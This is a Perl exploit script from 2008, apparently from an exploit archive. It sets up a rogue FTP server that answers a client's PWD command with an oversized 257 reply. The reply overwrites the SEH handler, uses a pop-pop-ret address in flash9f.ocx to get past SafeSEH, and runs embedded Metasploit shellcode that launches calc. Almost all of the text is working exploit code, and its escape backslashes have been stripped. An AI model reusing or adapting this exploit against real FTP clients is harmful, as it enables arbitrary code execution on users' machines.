# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx. use warnings;
use strict;
use IO::Socket; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".
"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".
"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".
"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".
"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".
"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".
"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".
"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".
"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".
"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";
my $sock = IO::Socket::INET->new( LocalAddr => '0.0.0.0', LocalPort => '21', Listen => 1, Reuse => 1); while(my $csock = $sock->accept())
{ print $csock "220 Hello ;)rn";
read_sock($csock); print $csock "331 pwd pleasern";
read_sock($csock); print $csock "230 OKrn";
read_sock($csock); print $csock "250 CWD command successful.rn";
read_sock($csock); print $csock "257 " . "x22" .
"x41" x 324 . "xEBx06x90x90" . # jump ahead
"x82x01x02x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;) $shellcode . "x90" x 840 .
"x22" .
" is current directory.rn"; close($csock);
exit;
} sub read_sock
{
my ($sock) = @_; my $buf = <$sock>; print "[client] -> $buf"; }